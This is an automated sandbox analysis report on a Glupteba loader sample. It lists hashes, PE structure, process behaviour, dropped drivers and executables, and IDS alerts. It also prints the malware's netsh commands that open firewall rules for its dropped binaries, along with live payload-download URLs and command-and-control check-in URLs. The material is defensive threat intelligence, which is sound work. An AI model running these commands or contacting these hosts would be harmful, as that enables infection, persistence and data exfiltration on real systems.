analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

312ee9b244c42e0de295a171af46df8ae8b084b95886a0af50800358d0c6edf1

Full analysis: https://app.any.run/tasks/9f41a0fe-00e0-45e9-9e5a-5dd0ac25eb6f
Verdict: Malicious activity
Threats:

Glupteba is a loader with information-stealing and traffic routing functionality. It is designed primarily to install other viruses on infected PCs but can do much more than that. In addition, it is being constantly updated, making this virus one to watch out for.

Analysis date: April 25, 2019, 11:52:36
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
loader
trojan
adware
glupteba
Indicators:
MIME: application/x-dosexec
File info: PE32 executable (GUI) Intel 80386, for MS Windows
MD5:

1EE5909A4AFEB0DECF52136D94738AC3

SHA1:

0D1BA1136E02EE5E4F1E137D7E20345F84DD8D54

SHA256:

312EE9B244C42E0DE295A171AF46DF8AE8B084B95886A0AF50800358D0C6EDF1

SSDEEP:

98304:XPBoy8Ff+p8rJeerXaFtNuiaWNIpPTLXm1LyUgctBmgeEw6t0cbQvt6XU:fBoXFwYJeersuLLEuUgvEvnct6k

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Known privilege escalation attack

      • 312ee9b244c42e0de295a171af46df8ae8b084b95886a0af50800358d0c6edf1.exe (PID: 1332)
    • Changes settings of System certificates

      • 312ee9b244c42e0de295a171af46df8ae8b084b95886a0af50800358d0c6edf1.exe (PID: 1332)
      • csrss.exe (PID: 4004)
    • Changes the autorun value in the registry

      • 312ee9b244c42e0de295a171af46df8ae8b084b95886a0af50800358d0c6edf1.exe (PID: 4040)
      • cloudnet.exe (PID: 3956)
    • Uses Task Scheduler to run other applications

      • csrss.exe (PID: 4004)
    • Loads the Task Scheduler COM API

      • schtasks.exe (PID: 1804)
      • schtasks.exe (PID: 288)
    • Application was dropped or rewritten from another process

      • windefender.exe (PID: 3308)
      • windefender.exe (PID: 3284)
      • cloudnet.exe (PID: 3956)
      • winboxls-0225-2.exe (PID: 2568)
    • Downloads executable files from the Internet

      • csrss.exe (PID: 4004)
    • Connects to CnC server

      • cloudnet.exe (PID: 3956)
    • GLUPTEBA was detected

      • cloudnet.exe (PID: 3956)
  • SUSPICIOUS

    • Starts CMD.EXE for commands execution

      • 312ee9b244c42e0de295a171af46df8ae8b084b95886a0af50800358d0c6edf1.exe (PID: 1332)
      • 312ee9b244c42e0de295a171af46df8ae8b084b95886a0af50800358d0c6edf1.exe (PID: 4040)
      • csrss.exe (PID: 4004)
      • windefender.exe (PID: 3284)
    • Modifies the open verb of a shell class

      • 312ee9b244c42e0de295a171af46df8ae8b084b95886a0af50800358d0c6edf1.exe (PID: 1332)
    • Adds / modifies Windows certificates

      • 312ee9b244c42e0de295a171af46df8ae8b084b95886a0af50800358d0c6edf1.exe (PID: 1332)
      • csrss.exe (PID: 4004)
    • Reads the machine GUID from the registry

      • 312ee9b244c42e0de295a171af46df8ae8b084b95886a0af50800358d0c6edf1.exe (PID: 1332)
      • csrss.exe (PID: 4004)
    • Application launched itself

      • 312ee9b244c42e0de295a171af46df8ae8b084b95886a0af50800358d0c6edf1.exe (PID: 332)
    • Uses NETSH.EXE for network configuration

      • cmd.exe (PID: 3100)
      • cmd.exe (PID: 992)
    • Executable content was dropped or overwritten

      • 312ee9b244c42e0de295a171af46df8ae8b084b95886a0af50800358d0c6edf1.exe (PID: 4040)
      • csrss.exe (PID: 4004)
      • cloudnet.exe (PID: 3956)
    • Creates files in the Windows directory

      • 312ee9b244c42e0de295a171af46df8ae8b084b95886a0af50800358d0c6edf1.exe (PID: 4040)
      • csrss.exe (PID: 4004)
    • Starts itself from another location

      • 312ee9b244c42e0de295a171af46df8ae8b084b95886a0af50800358d0c6edf1.exe (PID: 4040)
    • Starts SC.EXE for service management

      • cmd.exe (PID: 2188)
      • cmd.exe (PID: 1876)
      • cmd.exe (PID: 1360)
      • cmd.exe (PID: 2720)
    • Creates files in the driver directory

      • csrss.exe (PID: 4004)
    • Low-level read access rights to disk partition

      • msconfig.exe (PID: 2644)
    • Creates files in the user directory

      • cloudnet.exe (PID: 3956)
    • Creates a software uninstall entry

      • cloudnet.exe (PID: 3956)
    • Searches for installed software

      • csrss.exe (PID: 4004)
  • INFO

    • Reads settings of System Certificates

      • 312ee9b244c42e0de295a171af46df8ae8b084b95886a0af50800358d0c6edf1.exe (PID: 1332)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.exe | Win32 Executable MS Visual C++ (generic) (42.2)
.exe | Win64 Executable (generic) (37.3)
.dll | Win32 Dynamic Link Library (generic) (8.8)
.exe | Win32 Executable (generic) (6)
.exe | Generic Win/DOS Executable (2.7)

EXIF

EXE

MachineType: Intel 386 or later, and compatibles
TimeStamp: 2018:02:28 05:48:40+01:00
PEType: PE32
LinkerVersion: 9
CodeSize: 51200
InitializedDataSize: 5518336
UninitializedDataSize: -
EntryPoint: 0x30e3
OSVersion: 5.1
ImageVersion: -
SubsystemVersion: 5.1
Subsystem: Windows GUI

Summary

Architecture: IMAGE_FILE_MACHINE_I386
Subsystem: IMAGE_SUBSYSTEM_WINDOWS_GUI
Compilation Date: 28-Feb-2018 04:48:40
Detected languages:
  • Polish - Poland

DOS Header

Magic number: MZ
Bytes on last page of file: 0x0090
Pages in file: 0x0003
Relocations: 0x0000
Size of header: 0x0004
Min extra paragraphs: 0x0000
Max extra paragraphs: 0xFFFF
Initial SS value: 0x0000
Initial SP value: 0x00B8
Checksum: 0x0000
Initial IP value: 0x0000
Initial CS value: 0x0000
Overlay number: 0x0000
OEM identifier: 0x0000
OEM information: 0x0000
Address of NE header: 0x000000F0

PE Headers

Signature: PE
Machine: IMAGE_FILE_MACHINE_I386
Number of sections: 5
Time date stamp: 28-Feb-2018 04:48:40
Pointer to Symbol Table: 0x00000000
Number of symbols: 0
Size of Optional Header: 0x00E0
Characteristics:
  • IMAGE_FILE_32BIT_MACHINE
  • IMAGE_FILE_EXECUTABLE_IMAGE

Sections

Name
Virtual Address
Virtual Size
Raw Size
Charateristics
Entropy
.text
0x00001000
0x0000C614
0x0000C800
IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
6.734
.rdata
0x0000E000
0x00002A74
0x00002C00
IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
5.44828
.data
0x00011000
0x0051FA5C
0x004C2A00
IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
6.00313
.rsrc
0x00531000
0x001A7888
0x0001CA00
IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
4.8644
.reloc
0x006D9000
0x00004E18
0x00005000
IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
1.39024

Resources

Title
Entropy
Size
Codepage
Language
Type
1
5.48378
2216
UNKNOWN
Polish - Poland
RT_ICON
2
5.30662
1384
UNKNOWN
Polish - Poland
RT_ICON
3
3.30696
9640
UNKNOWN
Polish - Poland
RT_ICON
4
3.40276
4264
UNKNOWN
Polish - Poland
RT_ICON
5
3.39286
2440
UNKNOWN
Polish - Poland
RT_ICON
6
3.68694
1128
UNKNOWN
Polish - Poland
RT_ICON
7
3.23025
1212
UNKNOWN
Polish - Poland
RT_STRING
8
3.28939
1530
UNKNOWN
Polish - Poland
RT_STRING
9
3.25705
1970
UNKNOWN
Polish - Poland
RT_STRING
10
3.24937
1494
UNKNOWN
Polish - Poland
RT_STRING

Imports

KERNEL32.dll
USER32.dll
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
78
Monitored processes
28
Malicious processes
7
Suspicious processes
2

Behavior graph

Click at the process to see the details
start drop and start drop and start drop and start drop and start 312ee9b244c42e0de295a171af46df8ae8b084b95886a0af50800358d0c6edf1.exe cmd.exe no specs compmgmtlauncher.exe no specs compmgmtlauncher.exe no specs compmgmtlauncher.exe 312ee9b244c42e0de295a171af46df8ae8b084b95886a0af50800358d0c6edf1.exe no specs 312ee9b244c42e0de295a171af46df8ae8b084b95886a0af50800358d0c6edf1.exe cmd.exe no specs netsh.exe no specs cmd.exe no specs netsh.exe no specs csrss.exe schtasks.exe no specs schtasks.exe no specs cmd.exe no specs sc.exe no specs cmd.exe no specs sc.exe no specs cmd.exe no specs sc.exe no specs windefender.exe no specs cmd.exe no specs sc.exe no specs windefender.exe no specs msconfig.exe no specs msconfig.exe #GLUPTEBA cloudnet.exe winboxls-0225-2.exe

Process information

PID
CMD
Path
Indicators
Parent process
1332"C:\Users\admin\AppData\Local\Temp\312ee9b244c42e0de295a171af46df8ae8b084b95886a0af50800358d0c6edf1.exe" C:\Users\admin\AppData\Local\Temp\312ee9b244c42e0de295a171af46df8ae8b084b95886a0af50800358d0c6edf1.exe
explorer.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
3892cmd.exe /C CompMgmtLauncherC:\Windows\system32\cmd.exe312ee9b244c42e0de295a171af46df8ae8b084b95886a0af50800358d0c6edf1.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2716CompMgmtLauncherC:\Windows\system32\CompMgmtLauncher.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Computer Management Snapin Launcher
Exit code:
3221226540
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2852"C:\Windows\system32\CompMgmtLauncher.exe" C:\Windows\system32\CompMgmtLauncher.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Computer Management Snapin Launcher
Exit code:
3221226540
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
1220"C:\Windows\system32\CompMgmtLauncher.exe" C:\Windows\system32\CompMgmtLauncher.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Computer Management Snapin Launcher
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
332"C:\Users\admin\AppData\Local\Temp\312ee9b244c42e0de295a171af46df8ae8b084b95886a0af50800358d0c6edf1.exe" C:\Users\admin\AppData\Local\Temp\312ee9b244c42e0de295a171af46df8ae8b084b95886a0af50800358d0c6edf1.exeCompMgmtLauncher.exe
User:
admin
Integrity Level:
HIGH
Exit code:
0
4040"C:\Users\admin\AppData\Local\Temp\312ee9b244c42e0de295a171af46df8ae8b084b95886a0af50800358d0c6edf1.exe"C:\Users\admin\AppData\Local\Temp\312ee9b244c42e0de295a171af46df8ae8b084b95886a0af50800358d0c6edf1.exe
312ee9b244c42e0de295a171af46df8ae8b084b95886a0af50800358d0c6edf1.exe
User:
SYSTEM
Integrity Level:
SYSTEM
Exit code:
0
992cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"C:\Windows\system32\cmd.exe312ee9b244c42e0de295a171af46df8ae8b084b95886a0af50800358d0c6edf1.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2580netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yesC:\Windows\system32\netsh.execmd.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Network Command Shell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3100cmd.exe /C "netsh advfirewall firewall add rule name="CloudNet" dir=in action=allow program="C:\Users\admin\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe" enable=yes"C:\Windows\system32\cmd.exe312ee9b244c42e0de295a171af46df8ae8b084b95886a0af50800358d0c6edf1.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Total events
1 012
Read events
613
Write events
0
Delete events
0

Modification events

No data
Executable files
8
Suspicious files
0
Text files
0
Unknown types
0

Dropped files

PID
Process
Filename
Type
4004csrss.exeC:\Windows\windefender.exeexecutable
MD5:4F551CB9A7C7D24104C19AC85E55DEFE
SHA256:F118E52A73227B85FBB0CB7D202C3753916E518C516286C441A2DC92EDE1F023
4004csrss.exeC:\Users\admin\AppData\Local\Temp\csrss\winboxls-0225-2.exeexecutable
MD5:8D2B9DF9DD6C98A540E0FA53AE8BA1EB
SHA256:B562AD8C740BA4549BE9C7DC693C1F77BD2BA3BAC33128769D5A7E079BFDEDEC
4040312ee9b244c42e0de295a171af46df8ae8b084b95886a0af50800358d0c6edf1.exeC:\Windows\rss\csrss.exeexecutable
MD5:1EE5909A4AFEB0DECF52136D94738AC3
SHA256:312EE9B244C42E0DE295A171AF46DF8AE8B084B95886A0AF50800358D0C6EDF1
3956cloudnet.exeC:\Users\admin\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exeexecutable
MD5:BB7A5DDF026E495FD503FF0EBD091B01
SHA256:A1AE1FBBEEA63D1B2A5D656CA26202B167D13A9096F41A87C45CD15A1A89E0D0
4004csrss.exeC:\Users\admin\AppData\Local\Temp\csrss\cloudnet.exeexecutable
MD5:BB7A5DDF026E495FD503FF0EBD091B01
SHA256:A1AE1FBBEEA63D1B2A5D656CA26202B167D13A9096F41A87C45CD15A1A89E0D0
4004csrss.exeC:\Windows\System32\drivers\Winmon.sysexecutable
MD5:4EF0C39E632279D7B3672D2EFC071E5B
SHA256:889FB266C4C01BB4EF67635249C8DAEB641FC86CE62FC280B34BEEC415FB6129
4004csrss.exeC:\Windows\System32\drivers\WinmonFS.sysexecutable
MD5:0D3A8D67CD969C6E096B4D29E910DD9E
SHA256:EB0BE2AC3833C843214A55B14C31125A7B600D5272BDF322C4871F42627576E4
4004csrss.exeC:\Windows\System32\drivers\WinmonProcessMonitor.sysexecutable
MD5:622FD523A87CB55BE0B676A70C64E8F8
SHA256:F609C6656A0C451DAFA5173DF0CD848F7CB7F22C4F150F8D16716C12593DE66C
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
5
TCP/UDP connections
6
DNS requests
4
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
4004
csrss.exe
GET
200
104.18.43.41:80
http://apigeoip.com/cl.exe
US
executable
667 Kb
malicious
3956
cloudnet.exe
GET
200
91.121.171.161:8000
http://91.121.171.161:8000/stat?uptime=100&downlink=1111&uplink=1111&id=0012FA46&statpass=bpass&version=20190425&features=30&guid=CBCA08F7-7873-4211-9564-1CC1CEC4F29F&comment=20190425&p=0&s=
FR
text
11 b
malicious
4004
csrss.exe
GET
200
104.31.77.242:80
http://yearofair.club/app/watchdog.exe?t=2019-04-25
US
executable
1.37 Mb
suspicious
3956
cloudnet.exe
GET
91.121.171.161:80
http://CBCA08F7-7873-4211-9564-1CC1CEC4F29F.server-64.ehdy.ru/update.php?uid=CBCA08F7-7873-4211-9564-1CC1CEC4F29F&version=20190425&OS=win6.1,x86&have_admin=1&mys=1trailerhd.com,ehdy.ru,rbnj.ru,utjz.ru&build=20170301&cpu=Intel(R)+Core(TM)+i5-6400+CPU+%40+2.70GHz&video=Standard+VGA+Graphics+Adapter&ram=3&campaign=31339
FR
malicious
4004
csrss.exe
GET
200
104.31.77.242:80
http://yearofair.club/app/winboxls-0225-2.exe
US
executable
1.80 Mb
suspicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4004
csrss.exe
104.24.115.108:443
weekdanys.com
Cloudflare Inc
US
shared
1332
312ee9b244c42e0de295a171af46df8ae8b084b95886a0af50800358d0c6edf1.exe
104.24.115.108:443
weekdanys.com
Cloudflare Inc
US
shared
4004
csrss.exe
104.31.77.242:80
yearofair.club
Cloudflare Inc
US
shared
4004
csrss.exe
104.18.43.41:80
apigeoip.com
Cloudflare Inc
US
shared
91.121.171.161:80
CBCA08F7-7873-4211-9564-1CC1CEC4F29F.server-64.ehdy.ru
OVH SAS
FR
malicious
91.121.171.161:8000
CBCA08F7-7873-4211-9564-1CC1CEC4F29F.server-64.ehdy.ru
OVH SAS
FR
malicious

DNS requests

Domain
IP
Reputation
weekdanys.com
  • 104.24.115.108
  • 104.24.114.108
malicious
yearofair.club
  • 104.31.77.242
  • 104.31.76.242
suspicious
apigeoip.com
  • 104.18.43.41
  • 104.18.42.41
malicious
CBCA08F7-7873-4211-9564-1CC1CEC4F29F.server-64.ehdy.ru
  • 91.121.171.161
malicious

Threats

PID
Process
Class
Message
4004
csrss.exe
A Network Trojan was detected
ET CURRENT_EVENTS SUSPICIOUS Firesale gTLD EXE DL with no Referer June 13 2016
4004
csrss.exe
Misc activity
ET USER_AGENTS Go HTTP Client User-Agent
4004
csrss.exe
Misc activity
ET INFO Packed Executable Download
4004
csrss.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
4004
csrss.exe
A Network Trojan was detected
ET TROJAN Possible JKDDOS download cl.exe
4004
csrss.exe
Potentially Bad Traffic
ET CURRENT_EVENTS Terse alphanumeric executable downloader high likelihood of being hostile
4004
csrss.exe
Misc activity
ET USER_AGENTS Go HTTP Client User-Agent
4004
csrss.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
3956
cloudnet.exe
A Network Trojan was detected
ET TROJAN Win32.Glupteba/ClIEcker CnC Checkin
4004
csrss.exe
Misc activity
ET INFO Packed Executable Download
1 ETPRO signatures available at the full report
No debug info